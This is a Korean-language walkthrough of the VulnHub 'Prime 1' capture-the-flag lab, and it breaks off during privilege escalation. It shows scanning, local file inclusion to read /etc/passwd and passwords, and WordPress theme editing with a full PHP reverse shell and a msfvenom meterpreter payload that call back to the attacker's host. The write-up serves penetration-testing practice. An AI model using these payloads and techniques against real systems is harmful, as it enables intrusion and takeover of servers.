https://www.vulnhub.com/entry/prime-1,358/
1. Sanning
┌──(root💀takudaddy)-[~]
└─# nmap 192.168.20.2 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-25 11:48 KST
Nmap scan report for 192.168.20.2
Host is up (0.000063s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:A8:41:B1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds
┌──(root💀takudaddy)-[~]
└─# nmap -sV -O 192.168.20.2
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-25 11:55 KST
Nmap scan report for 192.168.20.2
Host is up (0.00018s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:A8:41:B1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.60 seconds
┌──(root💀takudaddy)-[~]
└─# nmap -A 192.168.20.2
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-25 11:55 KST
Nmap scan report for 192.168.20.2
Host is up (0.00019s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
MAC Address: 00:0C:29:A8:41:B1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.19 ms 192.168.20.2
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.82 seconds
┌──(root💀takudaddy)-[~]
└─# nmap -p- 192.168.20.2
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-25 11:56 KST
Nmap scan report for 192.168.20.2
Host is up (0.0015s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:A8:41:B1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 7.58 seconds
2. Web Enumeration
┌──(root💀takudaddy)-[/attack]
└─# ./webenum.sh 192.168.20.2 2 ⚙
=======================================================
Web Enumertation tool
by takudaddy
=======================================================
[ Running ] Nikto against 192.168.20.2
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.20.2
+ Target Hostname: 192.168.20.2
+ Target Port: 80
+ Start Time: 2021-03-25 14:05:04 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
^C
[ Running ] Dirb against 192.168.20.2
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Mar 25 14:05:45 2021
URL_BASE: http://192.168.20.2/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
+ http://192.168.20.2/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.20.2/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.20.2/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.20.2/wordpress/wp-admin/includes/
+ http://192.168.20.2/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.20.2/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.20.2/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.20.2/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.20.2/wordpress/wp-admin/user/
==> DIRECTORY: http://192.168.20.2/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.20.2/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.20.2/wordpress/wp-content/uploads/
+ http://192.168.20.2/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.20.2/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
+ http://192.168.20.2/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
+ http://192.168.20.2/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
+ http://192.168.20.2/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Mar 25 16:25:14 2021
URL_BASE: http://192.168.20.2/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.txt,.html,.php) | (.txt)(.html)(.php) [NUM = 3]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.20.2/ ----
+ http://192.168.20.2/image.php (CODE:200|SIZE:147)
+ http://192.168.20.2/index.php (CODE:200|SIZE:136)
+ http://192.168.20.2/secret.txt (CODE:200|SIZE:412)
-----------------
END_TIME: Thu Mar 25 16:25:31 2021
DOWNLOADED: 13836 - FOUND: 3
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.20.2/FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000257: 200 7 L 26 W 131 Ch "dev"
000000449: 301 9 L 28 W 317 Ch "javascript"
Total time: 1.145705
Processed Requests: 951
Filtered Requests: 949
Requests/sec.: 830.0559
: victor
워드프레스 단어 보자마자
wordpress enum
┌──(root💀takudaddy)-[/attack]
└─# wpscan --disable-tls-checks --url http://192.168.20.2/wordpress --enumerate u
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.20.2/wordpress/ [192.168.20.2]
[+] Started: Thu Mar 25 15:51:55 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.20.2/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://192.168.20.2/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.20.2/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.20.2/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.20.2/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
| - http://192.168.20.2/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.20.2/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2021-03-09T00:00:00.000Z
| Readme: http://192.168.20.2/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.0
| Style URL: http://192.168.20.2/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.20.2/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] victor
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Thu Mar 25 15:51:57 2021
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 16.75 KB
[+] Data Received: 16.632 MB
[+] Memory used: 172.781 MB
[+] Elapsed time: 00:00:02
┌──(root💀takudaddy)-[/attack]
└─# wpscan --disable-tls-checks --url http://192.168.20.2/wordpress --enumerate ap
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
┌──(root💀takudaddy)-[/attack]
└─# wpscan --url http://192.168.20.2/wordpress --enumerate dbe
: 유저명 말고는 별거 없음
: 커맨트 작성이 가능
여기까지 뭐가 많았지만
별 소득이 없었음.
* 기존에 사용하던 dirb 툴의
커맨드를 변형해서
아직 발견하지 못한
디렉터리는 없는지 확인해 본다.
기존 커맨드 :
dirb http://IP /usr/share /wordlists/dirb/common.txt
변형 커맨드 :
dirb http://IP/ -X .txt,.html,.php
┌──(root💀takudaddy)-[/attack]
└─# dirb http://192.168.20.2 -X .txt,.php,.html 2 ⚙
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Mar 25 21:38:23 2021
URL_BASE: http://192.168.20.2/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.txt,.php,.html) | (.txt)(.php)(.html) [NUM = 3]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.20.2/ ----
+ http://192.168.20.2/image.php (CODE:200|SIZE:147)
+ http://192.168.20.2/index.php (CODE:200|SIZE:136)
+ http://192.168.20.2/secret.txt (CODE:200|SIZE:412)
-----------------
END_TIME: Thu Mar 25 21:38:44 2021
DOWNLOADED: 13836 - FOUND: 3
: 못 찾았던 3 개의 페이지가 더 발견 되었다.
/image.php
/index.php
/secret.txt
/secret.txt
어떤 url 뒤에 loation.txt 붙이면
다음 단계로 넘어갈 수 있다고 한다.
그 어떤 url이 어떤건지 찾기위해
깃허브 사이트에서 wfuzz 툴 사용
팁을 확인해 보란다.
들어가 보면,
사용 방법 확인이 가능하고
wfuzz 툴로 index.php 페이지를
브루트 포싱하면
┌──(root💀takudaddy)-[/var/www/html]
└─# wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.20.2/index.php?FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.20.2/index.php?FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 7 L 12 W 136 Ch "@"
000000033: 200 7 L 12 W 136 Ch "active"
000000031: 200 7 L 12 W 136 Ch "action"
000000032: 200 7 L 12 W 136 Ch "actions"
000000007: 200 7 L 12 W 136 Ch "10"
000000035: 200 7 L 12 W 136 Ch "admin"
000000030: 200 7 L 12 W 136 Ch "accounting"
000000003: 200 7 L 12 W 136 Ch "01"
000000022: 200 7 L 12 W 136 Ch "aa"
000000020: 200 7 L 12 W 136 Ch "3"
뭐가 쭉 나오고
12W가 총 글자 카운트의 공통 길이인가보다.
이 길이를 필터로 넣어 한번 더 돌려보면
┌──(root💀takudaddy)-[/var/www/html]
└─# wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 12 http://192.168.20.2/index.php?FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.20.2/index.php?FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000341: 200 7 L 19 W 206 Ch "file"
Total time: 0.556778
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 1708.041
file 이라는 payload가 하나 나온다.
이거 알아내기 전까지는
파라미터에 하나씩 대입해보며
삽질만 반나절...
암튼
http://192.168.20.2/index.php?file=location.txt
: 다음 힌트는 어떤 php 페이지 뒤에
파라미터로 secrettier369을 붙이란다.
접속 가능한 php 페이지는
/image.php
뒤에 파라미터로 붙여주면
/image.php?secrettier360
찾은 듯 하다.
이제 뭐?
다시 검색 툴을 돌려보자.
┌──(root💀takudaddy)-[/attack]
└─# wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt \
--hc 404 http://192.168.20.2/image.php?secrettier360=FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.20.2/image.php?secrettier360=FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000003: 200 6 L 17 W 197 Ch "01"
000000031: 200 6 L 17 W 197 Ch "action"
000000047: 200 6 L 17 W 197 Ch "adminsql"
000000001: 200 6 L 17 W 197 Ch "@"
000000007: 200 6 L 17 W 197 Ch "10"
000000015: 200 6 L 17 W 197 Ch "2001"
┌──(root💀takudaddy)-[/attack]
└─# wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 17 http://192.168.20.2/image.php?secrettier360=FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.20.2/image.php?secrettier360=FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000257: 200 13 L 43 W 328 Ch "dev"
Total time: 0.566176
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 1679.687
/dev
파일 경로를 붙여보면 되는 듯 하다.
시도해보자.
=/etc/passwd
하단에 중요 정보가 있다.
saket 유저의 /home/saket 디렉터리에
password.txt file이 있단다.
=/home/saket/password.txt
PW = follow_the_ippsec
아이디는 saket인가
위에서 찾은 victor인가?
둘 다 시도해본다.
2-2. Gaining Access
시도 1 : ssh 로 접속 (둘다 실패)
시도 2 : wordpress 로그인 페이지로 접속
(saket 실패 / victor 성공)
참고로 침투 서버의 로그인 페이지를 보면
사용자가 victor라고 떡 하니 써있기도 하다.
암튼 침투했다.
3. Exploitation
테마를 수정하는 란에 들어가면
우측에 테마 파일을 선택할 수가 있는데
secret.php 파일이 보인다.
우리 파일을 업로드하는게 아니라
코드를 붙여 넣어야 한다.
연습을 위해
작업은 두 가지로 나누어 해본다.
1. /usr/share/webshells/php/php-reverse-shell.php에서
코드를 끌어다 쓰고 nc로 붙이기
┌──(root💀takudaddy)-[/attack]
└─# cat php-reverse-shell.php 2 ⚙
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.20.1'; // CHANGE THIS
$port = 7979; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
위 코드를 붙여 넣고 nc 로 리스너 기동,
──(root💀takudaddy)-[/attack]
└─# nc -lvp 7979 2 ⚙
listening on [any] 7979 ...
트리거가 되는 연결 경로는 wpscan으로 확인할 수 있고
[+] WordPress theme in use: twentynineteen
Location: http://192.168.20.2/wordpress/wp-content/themes/twentynineteen/
아래 secret.php
접속을 시도하면
http://192.168.20.2/wordpress/wp-content/themes/twentynineteen/secret.php
┌──(root💀takudaddy)-[/attack]
└─# nc -lvp 7979 2 ⚙
listening on [any] 7979 ...
192.168.20.2: inverse host lookup failed: Unknown host
connect to [192.168.20.1] from (UNKNOWN) [192.168.20.2] 35174
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
20:13:40 up 1:03, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$
연결 성공!
2. msfvenom으로 payload를 만들어
붙여 넣어보자.
# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.20.1 LPORT=7979 -f raw
┌──(root💀takudaddy)-[/attack]
└─# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.20.1 LPORT=7979 -f raw 2 ⚙
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1113 bytes
/*<?php /**/ error_reporting(0); $ip = '192.168.20.1'; $port = 7979;
if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}");
$s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port);
$s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f))
{ $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port);
if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); }
if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4);
break; case 'socket': $len = socket_read($s, 4); break; }
if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = '';
while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b));
break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } }
$GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type;
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
{ $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
위 코드를 복사해 붙여 넣고
업데이트 해준다.
리스너를 기동 후 연결시켜 보자.
┌──(root💀takudaddy)-[/attack]
└─# msfconsole -q 2 ⚙
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.20.1
LHOST => 192.168.20.1
msf6 exploit(multi/handler) > set LPORT 7979
LPORT => 7979
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.20.1:7979
[*] Started reverse TCP handler on 192.168.20.1:7979
[*] Sending stage (39282 bytes) to 192.168.20.2
[*] Meterpreter session 1 opened (192.168.20.1:7979 -> 192.168.20.2:35424) at 2021-03-25 23:22:53 +0900
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64
Meterpreter : php/linux
meterpreter > shell
Process 2537 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$
Linux ubuntu 4.10.0-28-generic 체크!
침투 성공!
4. Privilege Escalation
권한 상승을 위한 검색을 시작한다.
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ cd /home
<ml/wordpress/wp-content/themes/twentynineteen$ cd /home
www-data@ubuntu:/home$ ls -al
ls -al
total 16
drwxr-xr-x 4 root root 4096 Aug 29 2019 .
drwxr-xr-x 24 root root 4096 Aug 29 2019 ..
drwxr-xr-x 2 root root 4096 Aug 31 2019 saket
drwxr-x--x 20 victor victor 4096 Sep 1 2019 victor
www-data@ubuntu:/home$ cd saket
cd saket
www-data@ubuntu:/home/saket$ ls
ls
enc password.txt user.txt
www-data@ubuntu:/home/saket$ cat user.txt
cat user.txt
af3c658dcf9d7190da3153519c003456
www-data@ubuntu:/home/saket$ cat password.txt
cat password.txt
follow_the_ippsec
www-data@ubuntu:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(root) NOPASSWD: /home/saket/enc
www-data@ubuntu:/tmp$ find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/vmware-user-suid-wrapper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/bin/fusermount
/bin/umount
/bin/ping6
/bin/mount
/bin/su
/bin/ping
user flag를 찾았다
: af3c658dcf9d7190da3153519c003456
그리고 enc 파일은
아무나 실행 가능하다는데
암호를 입력 하란다..
머임 t(- -t )
NOPASSWD 라매~~
원래는
|
Enumerating further a backup_pass file is found in /opt/backup/server_database with credentials for “enc” executable. |
위 문구가 출력 되야함.
암튼 해당 경로로 이동해보면
enc 암호가 있고 실행시켜 보면
새로운 파일 두 개가 생성된다.
www-data@ubuntu:/opt/backup/server_database$ cat backup_pass
cat backup_pass
your password for backup_database file enc is
"backup_password"
Enjoy!
www-data@ubuntu:/opt/backup/server_database$ cd /home/saket
cd /home/saket
www-data@ubuntu:/home/saket$ ./enc
./enc
enter password: backup_password
backup_password
good
/bin/cp: stat '/root/enc.txt'
/bin/cp: stat '/root/key.txt'
www-data@ubuntu:/home/saket$ ls
ls
enc enc.txt key.txt password.txt user.txt
www-data@ubuntu:/home/saket$ cat enc.txt
cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
www-data@ubuntu:/home/saket$ cat password.txt
www-data@ubuntu:/home/saket$ cat key.txt
cat key.txt
I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.
파일 하나는 base64(추정)으로 암호화된 암호문,
다른 하나는 md5로 변환시키란다.
하나씩 해보자.
1. ippsec을 md5 hash로 암호화 하기
┌──(root💀takudaddy)-[/var/www/html]
└─# echo -n ippsec | md5sum
366a74cb3c959de17d61db30591c39d1 -
해당 값이 암호를 푸는 키일까?
2. enc.txt 파일 복호화 하기
base64 방식으로 보이나
일반적인 방법으로 해독이 안된다.
AES-256-ECB 알고리즘을 사용해
암호화 되어있기 때문.
openssl을 사용하려면 hex로 된 키 값이
필요하단다. 고로 위 값을 hex 값으로 전환
┌──(root💀takudaddy)-[/var/www/html]
└─# echo -n 366a74cb3c959de17d61db30591c39d1 | od -A n -t x1 130 ⨯
33 36 36 61 37 34 63 62 33 63 39 35 39 64 65 31
37 64 36 31 64 62 33 30 35 39 31 63 33 39 64 31
해당 문자열을 해독하는 절차 :
base64 암호문을 openssl로 넘긴다 >
받은 암호문은 openssl 암호화 방식 aes-256-ecb를 사용해
-d 복호화 할건데
-a 작업 전 후 과정에 base64 인코딩을 적용
복호화를 위한 키(-k)는 위 hex 값 >
이것을 다시 base64로 넘긴 후 >
base64로 디코딩
┌──(root💀takudaddy)-[/var/www/html]
└─# echo "nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=" | openssl enc -aes-256-ecb -d -a -K 3336366137346362336339353964653137643631646233303539316333396431 | base64 | base64 -d
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,
tribute_to_ippsec 이
암호인듯 하다.
saket 유저로 전환해보자.
www-data@ubuntu:/home/saket$ su saket
su saket
Password: tribute_to_ippsec
saket@ubuntu:~$
saket@ubuntu:~$ id
id
uid=1001(saket) gid=1001(saket) groups=1001(saket)
saket@ubuntu:~$ whoami
whoami
saket
saket@ubuntu:~$
성공!
계속 캐본다.
saket@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User saket may run the following commands on ubuntu:
(root) NOPASSWD: /home/victor/undefeated_victor
saket@ubuntu:~$ sudo /home/victor/undefeated_victor
sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
/home/victor/undefeted_victor가 /tmp/challenge로
